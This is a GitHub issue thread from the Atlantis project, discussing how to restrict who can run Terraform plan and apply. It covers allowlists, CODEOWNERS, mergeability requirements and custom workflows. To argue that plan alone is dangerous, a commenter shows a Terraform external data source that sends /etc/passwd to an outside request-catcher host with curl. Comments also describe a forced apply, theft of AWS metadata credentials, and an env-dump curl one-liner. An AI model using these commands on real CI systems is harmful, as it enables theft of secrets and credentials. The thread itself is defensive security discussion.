runatlantis / atlantis

Terraform Pull Request Automation
https://www.runatlantis.io
Other
7.83k stars 1.06k forks source link

Restrict Plan or Apply to Github Teams or Github Users #308

Closed osterman closed 2 years ago

osterman commented 6 years ago

what

why

proposal

add the following flags.

Allow an explicit set of users.

--gh-user-whitelist=osterman,goruha,aknysh

Allow teams in an organization

--gh-team-whitelist=ops
--gh-org-whitelist=cloudposse

The arg convention is piggybacking on the existing convention of --repo-whitelist and that all github features are prefix with --gh-*


an alternative interface could be based on CODEOWNERS, but I think that will be more work to implement.

jordan-evans commented 6 years ago

Could this also be extended into the other repository providers (e.g. GitLab)?

osterman commented 6 years ago

@darrylb-github any thoughts on this one?

darrylb-github commented 6 years ago

@darrylb-github any thoughts on this one?

@osterman Yea we're hitting the same problems. We initially tried via protected branches and requiring approval in atlantis but this way you would have to protect all branches which doesn't work well.

Your proposal would solve this for us as well via the --gh-team-whitelist option. I can't currently think of a better way to solve this.

Think it would be beyond my atlantis/go experience at the moment to attempt to implement this myself though, but it does feel a bit like a deal breaker at the moment unless we can find another workaround 🤔

darrylb-github commented 6 years ago

Note I don't think its necessary to restrict plans though; it's the apply I'm worried about.

osterman commented 6 years ago

@aknysh on my team started working on this today. Will keep you posted.

In our case, plans also need to be restricted since the external data provider runs on every plan and can run any command.

lkysow commented 6 years ago

I think the best way to implement this is to use a server-side Atlantis.yaml config (#47). I don't want to go the direction of server flags because it's not scalable. Inevitably someone is going to want a specific config for a specific Terraform repo/directory/workspace which they won't be able to accomplish with a global flag.

Unfortunately the server-side config isn't complete but I think this will have to wait for that.

majormoses commented 6 years ago

Can't this already be achieved with github CODEOWNERS?

majormoses commented 6 years ago

Note I don't think its necessary to restrict plans though; it's the apply I'm worried about.

I agree the scary thing from a security stance are the ability to run local and remote exec blocks but those are not run during a plan.

majormoses commented 6 years ago

I suppose longer term supporting commands like state (mv|rm) comes to mind as well when they are added to atlantis.

osterman commented 6 years ago

We've implement this here: https://github.com/cloudposse/atlantis/pull/7

osterman commented 6 years ago

We're taking atlantis to the extreme. My goal is to have it on public repos so we can test modules. terraform plan is dangerous. As long as you can access the external data provider, you can do anything you want. The external data provider runs necessarily on plan and will execute any command on the machine.

Best policy is to know exactly who can run apply and plan.

osterman commented 6 years ago

Unfortunately the server-side config isn't complete but I think this will have to wait for that.

@lkysow, I understand your position. As an architect of many systems, I struggle with it daily.

Guess from where I stand this is a hard stop, don't even consider using atlantis kind of problem that any one I talk to shares. They love the idea of atlantis, but when I say "oh, and anyone with access to the repo can trigger an apply", it's a non-starter. Sometimes "what gets you here, doesn't get you there". I understand the desire to put this into the server-side config. But sounds like the scope of that is much greater. Adding a stop-gap measure to address a major liability from a security perspective is warranted IMO, even if it is longer-term not the ideal solution.

majormoses commented 6 years ago

@osterman when you say if you can plan you can do anything you want can you expand? Local/remote exec blocks are not evaluated during a plan so any easy exfiltration and code execution can be stopped by requiring code review on it as long as you are using the --require-approval serverside option and CODEOWNERS. As CODEOWNERS from github is evaluated based on your default branch (typically master) rather than what's in your branch/fork that you are proposing, this would require someone with repo access two pull requests to accomplish an attack with this and would require write protection as well as either an approval or privileges to bypass any branch protections. I can see the danger that they could write their own terraform provider that does pretty much anything they want. In the context of allowing it for only internal projects I think that would be sufficient but with it being external I can see why that would be a major concern.

but when I say "oh, and anyone with access to the repo can trigger an apply", it's a non-starter.

Agreed if that was the case, but like I said with a CLI arg and CODEOWNERS you can gate the apply even if not the plan, there is still danger for your use case but at least the barrier of entry is much higher.

I understand the desire to put this into the server-side config.

If it's meant to be a meaningful protection it must be serverside (whether its a config option or CLI args) as otherwise an attacker can just change the permissions themselves.

I do see needing more fine grained access controls in the future to safely support public projects as well as when other commands are implemented such as state, destroy, etc.

lkysow commented 6 years ago

oh, and anyone with access to the repo can trigger an apply

Can you explain why you think this is the case?

With --require-approval you need to be able to approve a pull request prior to apply. The list of approvers can be gated in all VCS providers.

Or do you mean that once a PR is approved, then anyone can apply? Which is true.

osterman commented 6 years ago

@osterman when you say if you can plan you can do anything you want can you expand? Local/remote exec blocks are not evaluated during a plan

Here's an example of using the external data provider to exfiltrate data during a plan.

Providers are not like the local or remote provisioners. They can hook into any part of the terraform lifecycle. In this case, the external data provider hooks into the plan cycle so that it can source data from external commands (e.g. a python script).

Here's an example of exfiltrating the first line of the /etc/passwd file (useless these days), to an external site http://exfiltrate.requestcatcher.com/test

Running terraform plan on the following will result on this command getting executed. It's run in the same context as an apply (e.g. EC2 instance profiles or ECS task roles), so presumably with all the same AWS credentials etc. It could be much worse.

# https://www.terraform.io/docs/providers/external/data_source.html
data "external" "example" {
  program = ["/bin/bash", "-c", "(head -1 /etc/passwd | curl -XPOST -d@- http://exfiltrate.requestcatcher.com/test >/dev/null); echo {}" ]
  query = { }
}

image

@majormoses CODEOWNERS you can gate the apply even if not the plan, there is still danger for your use case but at least the barrier of entry is much higher.

This may be true on GitLab or other VCS, but not on GitHub. Per the atlantis documentation anyone can approve a pull request. As far as I understand, the CODEOWNER only gates merging.

@lkysow With --require-approval you need to be able to approve a pull request prior to apply. The list of approvers can be gated in all VCS providers.

Maybe there's some extra toggle somewhere in GitHub that further restricts approvals across the board. I won't rule it out.

image

This also seems to be the case per the CODEOWNERS documentation.

they also can optionally require approval from a code owner before the author can merge a pull request in the repository

But the fact remains, a terraform plan can today execute any command.

If it's meant to be a meaningful protection it must be serverside

Sorry, that was my own ambiguity. I was referring to args passed to atlantis server.

@aknysh on our team has implemented this here: https://github.com/cloudposse/atlantis/pull/7

Since it didn't seem like it was going to be accepted (per the earlier discussion), we didn't open a PR against runatlantis/atlantis

osterman commented 6 years ago

Now, what would be truly nasty is to curl http://169.254.169.254/latest/meta-data/iam/security-credentials/... and exfiltrate those STS credentials and thus have carteblanche remote access to AWS with whatever privileges are given to atlantis.

majormoses commented 6 years ago

This may be true on GitLab or other VCS, but not on GitHub. Per the atlantis documentation anyone can approve a pull request. As far as I understand, the CODEOWNER only gates merging.

So from what I remember (I could be wrong or not remembering correctly) if you set branch protection to use CODEOWNERS it affects the mergable state and atlantis uses this to determine if you can apply so anyone who has write access to the repo but is not a CODEOWNERs review does not count. I can try to setup a test to validate this.

osterman commented 6 years ago

@majormoses that would be cool - would love confirmation if that's how it works. If so, the atlantis documentation may be misleading since the red warning dialog seems to say something different. However, since I could run the following in a terraform plan to trigger a terraform apply, it makes no effective difference to a bad actor. We need a plan_requirements section as well.

data "external" "example" {
  program = ["/bin/bash", "-c", "terraform apply>/dev/null 2>&1); echo {}" ]
  query = { }
}
majormoses commented 6 years ago

But the fact remains, a terraform plan can today execute any command.

It wouldn't be very useful if it couldn't and I agree on the need to restrict that further especially with implementing additional commands state, destroy, etc. Just trying to figure out if the current protections are meaningful enough for internal projects where its more to prevent naive users from doing bad things as opposed to malicious actors.

osterman commented 6 years ago

I have direct knowledge of a company who had 2 developer accounts hacked on the same weekend a few months back. Both had mandatory MFA enabled on their GitHub and Google email accounts. In their case, a social engineering attack allowed SIM jacking. A white list is not perfect. MFA would be better. But I'm just talking baby steps right now. Reducing the attack surface by restricting the number of engineers that can plan/apply changes (at least to production) makes me feel better.

majormoses commented 6 years ago

I just tested and it looks like it does not look at the mergability state to determine if the apply can be run @lkysow is that a bug or intended I might be remembering wrong but I seem to recall us talking about this a while ago.

majormoses commented 6 years ago

Found it, it was something being discussed but not yet implemented: https://github.com/runatlantis/atlantis/issues/43 @osterman if that was implemented would that solve most of your concerns? While it still relies on trust from github and a compromised account with enough privs could certainly disable protections I think this would be a huge step in the right direction and should not be too hard to implement I would think. One of the benefits of this approach is that it works with github and gitlab (not sure if bitbucket or other VCS providers have similar concepts) so it would help the most people for the least amount of effort.

osterman commented 6 years ago

Btw, the GitHub Universe conference is happening this week. Heard through the grapevine that better RBAC is coming (fingerscrossed!) That said, same source said GitHub was not coming out with CI/CD and we know how that turned out. =P

@majormoses Re: #43, yes & no. I agree 100% with the intent of #43. Mergability should be a criteria for apply when we say approved; though perhaps an additional requirement . However, it's not configurable enough.

apply_requirements: [approved, mergable]

If you take a look at our proposed solution in this PR: https://github.com/cloudposse/atlantis/pull/7 it scales somewhat better in terms of flexibility.

atlantis server --gh-team-whitelist=dev:plan,ops:apply,devops:*

This says that a team called dev can run plan, and the team called ops can run apply and a team called devops can do anything. Now, if we introduced a new verb like destroy, that could easily be tied to another team.

Granted, if a user wants to do full-on RBAC per workflow/step/etc, it's a very slippery slope.

I admit that this is kind'a GitHub centric approach. We needed something before 10/25 =)

majormoses commented 6 years ago

@osterman makes sense I agree that more granular is better and hope github RBAC is gonna improve although it will probably mean tons of refactoring again at my org.

There are several things to consider with the proposed approach. At my current organization we have 85 teams (and that might actually go up quite a but as we are breaking up some of our larger teams) so providing even 15-20 teams seems like not the best solution for CLI arg though with a config file that might be OK. How would we handle sub/child teams? The more you specify on the command line, the more it is exposed to the process table which is accessible to any user and could be used to plan the next attack. I generally recommend providing anything sensitive (secrets, team names, repo names, permissions, etc) to be specified via a config file, ENV var, or pulled from a secret manager directly (such as hashicorp vault, aws ssm, etc).

Granted, if a user wants to do full-on RBAC per workflow/step/etc, it's a very slippery slope.

I don't think atlantis should be in the business of providing real RBAC for this very reason. In its current state I'd say it's best to let some external process push status checks to your VCS provider and using the mergable status it gives to determine if it can perform an action or not. At some point it might make more sense to try to flesh out more of a full RBAC solution but I think atlantis should provide "good enough" (highly subjective what that means) security and focus on other core improvements. I do agree that in the context of adding new commands outside plan/apply we need something more robust.

Anyways that's just my $0.02

lkysow commented 6 years ago

Wow, a lot to read here and I agree with both of you. I'm going to write up a bigger response with some plans to move forward so don't think I'm ignoring this, just crafting it!

kipkoan commented 6 years ago

oh, and anyone with access to the repo can trigger an apply

Can you explain why you think this is the case?

With --require-approval you need to be able to approve a pull request prior to apply. The list of approvers can be gated in all VCS providers.

I don't know of a way to do this with Bitbucket (Server / Data Center). You can have a list of required approvers for a merge, but anyone can be added as a reviewer and then approve it.

-- Kip

osterman commented 6 years ago

For those interested, we have a prototype of --gh-repo-whitelist available here (with binary releases): https://github.com/cloudposse/atlantis/releases

See pulls: https://github.com/cloudposse/atlantis/pulls

It also includes a number of other experimental features like --wake-word and --repo-config

estahn commented 5 years ago

@majormoses @lkysow Would you be able to explain how CODEOWNERS help? It appears to be ignored by Atlantis.

lkysow commented 5 years ago

Right now it doesn't.

When #43 is fixed (#385 was just opened to fix it), then you can make mergeability an apply_requirement and then make approval by CODEOWNERS required for a pull request to be mergeable.

osterman commented 5 years ago

I'm excited about #385 ! It's a step in the right direction.

Not to beat a dead horse, just want to emphasize that without something like plan_requirements, we're still very exposed since any command can be executed as part of plan. I don't want companies having a false sense of security. Full context of previous discussion available here.

majormoses commented 5 years ago

@osterman I feel you, I don't think you are beating a dead horse. I agree we need something more but it's a good start and leaves room for improvement. Would using the mergeable field work for gating plans via a plan_requirements config option satisfy your needs? I'm still of the opinion that we should have the VCS providers (through mechanisms such as CODEOWNERS) keep track of lists of people as chances are they are already being tracked and updated. Trying to reduce the duplication as much as possible.

estahn commented 5 years ago

@osterman I wonder if there could be some conditions around when to execute plan automatically. Or do you consider all resources as (not just data, local, ...) as dangerous?

osterman commented 5 years ago

thanks @majormoses !

Would using the mergeable field work for gating plans via a plan_requirements config option satisfy your needs?

Let's try to codify our "cloudposse" requirements:

  1. We would like to allow anyone (contributor, public, etc) to open a PR (but not anyone to run plan or apply)
  2. We would like to allow a specicific list of users to run plan (it could be CODEOWNERS, but could also be opened up to a larger trusted group)
  3. With #385 and CODEOWNERS the need to restrict who can run apply is sufficiently addressed

So as a stop gap measure, I think plan_requirements would work actually. It just puts more onus on CODEOWNERS to also run plan.

I'm still of the opinion that we should have the VCS providers (through mechanisms such as CODEOWNERS) keep track of lists of people as chances are they are already being tracked and updated.

Yes, that would be my top choice as well.

osterman commented 5 years ago

Another idea would be to require a certain number of CODEOWNERS to approve a PR for apply to work (configurable). And then another number of approvals to allow plan to work. This then implements a sort of two-man rule. Haven't through this through too much; just trying to see how we could stick within the confines of the CODEOWNERS and approvals framework.

e.g.

example use-case

osterman commented 5 years ago

I wonder if there could be some conditions around when to execute plan automatically. Or do you consider all resources as (not just data, local, ...) as dangerous?

@estahn would prefer not to go down this path of evaluating resource safety because we use atlantis for not just terraform. Also, with external commands, I don't think there's any practical way to achieve this.

majormoses commented 5 years ago

Another idea would be to require a certain number of CODEOWNERS to approve a PR for apply.

You can actually do that via branch protections: image

That does not address different plan vs apply requirements but you could satisfy a two man switch via means already (or shortly) available.

majormoses commented 5 years ago

We would like to allow anyone (contributor, public, etc) to open a PR (but not anyone to run plan or apply)

That sounds pretty doable with the current framework

We would like to allow a specicific list of users to run plan (it could be CODEOWNERS, but could also be opened up to a larger trusted group)

Sounds like adding plan_requirements and mergable satisfies the first portion, for the second portion what would you envision? Would it be anyone with write access to a repo (we probably need admin permissions on the repo to determine that) or a list?

With #385 and CODEOWNERS the need to restrict who can run apply is sufficiently addressed

:+1:

justinhauer commented 5 years ago

What is the status of this thread? My company is seriously looking at implementing Atlantis and knowing the outcome of this discussion seems pretty important. @majormoses @lkysow @osterman

majormoses commented 5 years ago

The "mergeable" option has been released, this allows you to disable auto planning and relying on branch protections (such as CODEOWNERS with multiple reviews) to gate running a plan. While it does not address the specific request and I agree it still needs to be added but I think this should address most of the concerns around this in its current state. I think this will be an important prerequisite to introducing new features that allow state manipulation (import, rm, mv, etc). I won't speak for @lkysow or @osterman but I don't see this as critical to implement right now without looking at adding additional state commands beyond plan and apply.

@justinhauer do those address your concerns? If not I would like to understand your use case and flow.

justinhauer commented 5 years ago

@majormoses I just want to be cystal clear with your comments here (I think it addresses my needs). 1) If I disable auto planning, I can require review/approval to run atlantis plan 2) I can have a member of CODEOWNERS be required to be one of the reviewers of each review/approval stage? 3) The same would apply to atlantis apply - needing a member of CODEOWNERSto approve?

Or did I misinterpret 2 and 3, and I can't restrict who can approve, I can just set the review to multiple persons?

majormoses commented 5 years ago

Actually sorry I misspoke, it's been a while and keeping track of the various conversations, issues, pull requests, etc in my head has been difficult. I think the next step is introducing a plan_requirements similar to apply_requirements and then use the mergeableoption to gate 1. You can currently fulfill 2 and 3 currently via CODEOWNERS, branch protections, and apply_requirements.

I will say that I am pretty comfortable with my use case for my org at the moment because we do not have any public repos that we hook up to atlantis and at the moment we are only using it for github management itself. Given the fact that they would need to compromise the github accounts (which as Erik pointed out is certainly doable), know enough about some of the ways that external data sources can be abused in a plan, etc to circumvent current protections. This obviously is easier on a public project since they intrinsically can run a plan without compromising any accounts.

lkysow commented 5 years ago

This can be accomplished via a custom server-side workflow now:

workflows:
  custom:
    plan:
      steps:
      - if [ $USERNAME != "username" ]; then exit 1; fi
      - init
      - plan
ericnorris commented 5 years ago

I've been doing a little bit of research into Atlantis recently and came upon this thread - for what it's worth, I believe running Atlantis with terraform plugins pre-installed and initing with -get-plugins=false could mitigate the issues raised with plan.

By pre-installing plugins, administrators could remove the ability to use the external provider, which is likely not necessary for most installations. There is some info here. From what I'm reading it's possible to use Atlantis' custom workflows to add these additional parameters.

majormoses commented 5 years ago

@ericnorris hmm I am not sure that would help as you could still leverage something that the system would have available. See the following comments:

These examples I think clearly illustrate the issue, essentially it highlights the danger of any CI system. It allows arbitrary code injection, if it did not it would not be very flexible. An attacker essentially needs nothing more than to say dump the env vars (essentially env | curl -XPOST some_server -d @-), cat a tfvars file, etc and then exfiltrate the data in some way. Probably sending a post via curl is one of the less detectable methods but they could simply add it as an output and get the data via the VCS provider comment on the PR. The fact is whatever is on the system for legitimate users are available for abuse as well. On most systems that will minimally be some form of shell as well as some additional scripting languages installed by the OS or admin (python, perl, ruby, etc). While I think -get-plugins=false does solve some security concerns it only addresses part of the concerns here. I am all for layering protections but I don't want to give a false sense that this would fully address the problems outlined here.

ericnorris commented 5 years ago

@majormoses, unless I'm mistaken, all of those examples use the external provider, no? It is not a built-in provider, and is downloaded automatically from here. If you don't install that plugin, and limit terraform to only using pre-installed plugins, you cannot exfiltrate data during plan using external.

I understand that there may be other ways (e.g. local-exec provisioners) but I believe you will be safe during the plan stage if you only use providers that do not provide arbitrary code execution during the plan stage.

majormoses commented 5 years ago

@ericnorris you are correct (as long as client side config is disabled) I thought it was a default included provider. I suppose if someone is using an old enough version of terraform where the plugins were embedded that would be an issue. That being said it's not something we can control and they should be encouraged to upgrade anyways. There are some cases where an external data source would be required. I think one could add a custom workflow to have it available for a specific state I suppose for that and default to a plugin directory. That being said if it's installed on the system and you allow client (repo side) config all bets are off. If you enable client side config, they can simply include it in the repo (as a local path) and modify the workflow to use a local repo bypassing all the administrative protections.

Given this I think that it makes sense as it minimally solves the bulk of the concerns if not in its entirety. @osterman I think we still should implement some more controls around different atlantis commands (which I see as a blocker to implement additional state modification commands such as state rm, state rm, import, etc) but are there any other holes I am not seeing by changing the init commands to not download plugins? This at least forces the administrator into intentionally allowing remote code execution so I think minimally it's a good step in the right direction.

One question I have is should this be exposed as a first class config property or simply rely on server side defined custom workflows and document how to accomplish that? I assume if we expose it we should default to existing behavior as to keep backwards compatibility.

svenwb commented 5 years ago

This can be accomplished via a custom server-side workflow now:

workflows:
  custom:
    plan:
      steps:
      - if [ $USERNAME != "username" ]; then exit 1; fi
      - init
      - plan

This solution works for us as well. I just would like to add having the Github teams the user is assigned to available as a variable would make this more flexible and easier to maintain.

red8888 commented 5 years ago

@svenwb does this work with bitbucket too? will $USERNAME have bitbucket username?

lkysow commented 5 years ago

@svenwb does this work with bitbucket too? will $USERNAME have bitbucket username?

Yes it will.

red8888 commented 5 years ago

amazing! So if I wanted to run apply and destroy with the default behavior and just add a check for an allowed list of users I would just have to do this right?

apply:
  steps:
    - run: echo 'Checking Bitbucket user is allowed to run atlantis apply'
    - run: "if [ $USERNAME != "username" ]; then exit 1; fi"
    - init
    - apply
destroy:
  steps:
    - run: echo 'Checking Bitbucket user is allowed to run atlantis apply'
    - run: "if [ $USERNAME != "username" ]; then exit 1; fi"
    - init
    - apply